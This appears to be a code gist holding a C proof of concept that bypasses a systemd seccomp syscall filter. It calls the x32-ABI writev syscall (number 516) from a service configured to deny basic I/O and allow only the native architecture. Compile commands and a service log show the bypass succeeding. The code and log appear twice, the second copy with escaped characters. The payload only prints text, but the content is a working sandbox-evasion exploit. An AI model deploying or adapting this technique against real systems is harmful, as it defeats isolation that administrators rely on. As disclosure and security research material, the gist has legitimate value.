masthoon · December 17, 2022 16:55
diff --git a/seccomp_bypass_x32_compat.c b/seccomp_bypass_x32_compat.c
 /*
 root@ubuntu:/# gcc seccomp_bypass_x32_compat.c -w -static -o test
 root@ubuntu:/# cat /etc/systemd/system/test.service
 [Unit]
 Description=Test attack
 [Service]
 Type=oneshot
 # Remove IO from the service
 SystemCallFilter=~@basic-io
 # Limit ABI to x64 only
 SystemCallArchitectures=native
 ExecStart=/test
 root@ubuntu:/# systemctl daemon-reload && systemctl start test && systemctl status test.service
 ● test.service - Test attack
   Loaded: loaded (/etc/systemd/system/test.service; static; vendor preset: enabled)
   Active: inactive (dead)
 Mar 22 02:18:36 ubuntu systemd[1]: Starting Test attack...
 Mar 22 02:18:36 ubuntu test[21377]: [X32] Freedom of speech !
 Mar 22 02:18:36 ubuntu systemd[1]: Started Test attack.
 */

 #include <errno.h>
 #include <unistd.h>
 #include <stdint.h>
 #include <sys/mman.h>
 #include <string.h>
 #include <syscall.h>

 struct iovec_32 {
    uint32_t iov_base;
    uint32_t iov_len;
 };

 void * addr_32;

 void test_X32_ID()
 {
    char * s = "[X32] Freedom of speech !\n";
    strncpy((char*)addr_32, s, strlen(s));
    
    struct iovec_32 iov;
    iov.iov_base = (uint32_t)addr_32;
    iov.iov_len = (uint32_t)strlen(s);
    
    syscall(516, 1, &iov, 1);
 }

 int main(int argc, char *argv[])
 {   
    addr_32 = mmap((void*)0x690000, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, 0, 0);

    // Test new X32 ID
    test_X32_ID();

    return 0;
 }
	/*
	root@ubuntu:/# gcc seccomp_bypass_x32_compat.c -w -static -o test
	root@ubuntu:/# cat /etc/systemd/system/test.service
	[Unit]
	Description=Test attack
	[Service]
	Type=oneshot
	# Remove IO from the service
	SystemCallFilter=~@basic-io
	# Limit ABI to x64 only
	SystemCallArchitectures=native
	ExecStart=/test
	root@ubuntu:/# systemctl daemon-reload && systemctl start test && systemctl status test.service
	● test.service - Test attack
	Loaded: loaded (/etc/systemd/system/test.service; static; vendor preset: enabled)
	Active: inactive (dead)
	Mar 22 02:18:36 ubuntu systemd[1]: Starting Test attack...
	Mar 22 02:18:36 ubuntu test[21377]: [X32] Freedom of speech !
	Mar 22 02:18:36 ubuntu systemd[1]: Started Test attack.
	*/

	#include <errno.h>
	#include <unistd.h>
	#include <stdint.h>
	#include <sys/mman.h>
	#include <string.h>
	#include <syscall.h>

	struct iovec_32 {
	uint32_t iov_base;
	uint32_t iov_len;
	};

	void * addr_32;

	void test_X32_ID()
	{
	char * s = "[X32] Freedom of speech !\n";
	strncpy((char*)addr_32, s, strlen(s));

	struct iovec_32 iov;
	iov.iov_base = (uint32_t)addr_32;
	iov.iov_len = (uint32_t)strlen(s);

	syscall(516, 1, &iov, 1);
	}

	int main(int argc, char *argv[])
	{
	addr_32 = mmap((void*)0x690000, 0x1000, PROT_READ \| PROT_WRITE, MAP_PRIVATE \| MAP_ANON, 0, 0);

	// Test new X32 ID
	test_X32_ID();

	return 0;
	}